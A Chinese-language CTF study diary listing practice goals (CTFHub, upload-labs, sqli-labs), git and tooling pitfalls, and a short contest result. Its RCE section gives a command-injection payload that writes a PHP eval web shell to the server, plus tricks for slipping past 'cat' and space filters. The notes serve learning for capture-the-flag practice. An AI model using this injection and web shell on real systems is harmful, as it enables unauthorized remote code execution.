0x00 习惯的养成

早睡早起，锻炼身体，做TODO，让生活慢下来

专注的去做几件事

距离Ctf升降赛还有0天。

0x01 今天的小目标

1. 重要目标

• 完成 Ctfhub 的信息泄露，密码口令 和 SQL注入

• 完成 Upload-labs 的训练和总结

• 信息泄露_Git+NU1L的SQL注入

• 完成 Sqli-labs 的训练和总结

• 选拔赛

0x03 各种踩坑

1. kali有pyhton2和python3
2. dirsearch因为作者的原因出bug 回退上个版本
3. Githack 老版本不能获取.git文件夹，只针对.git存在的对象
4. Git 暂存区的概念 git stash 保存暂存区和工作区的进度/ git stash pop 恢复最新的进度到工作区。
5. git index是版本库

0X04 RCE远程执行

方法1：ls ../
方法2:127.0.0.1&echo -e "<?php @eval(\$_POST['ice']);?>" > 111.php 
#cat过滤
反斜杠 ： 例如  ca\t fl\ag.php
连接符： 例如   ca''t fla''g.txt
#空格过滤
<,<>,%20(space),%09(tab),$IFS$9, ${IFS},$IFS
#分隔符可以使用%0a代替
若直接使用文本框上传命令会导致字符被转义，直接访问URL

0X05 短暂的结果

QAQ真刺激啊这比赛,第7就是我了。

PS:😅好多原题没做出来，有种考研数学一的味道了，每天做点题，做题实在是太少了。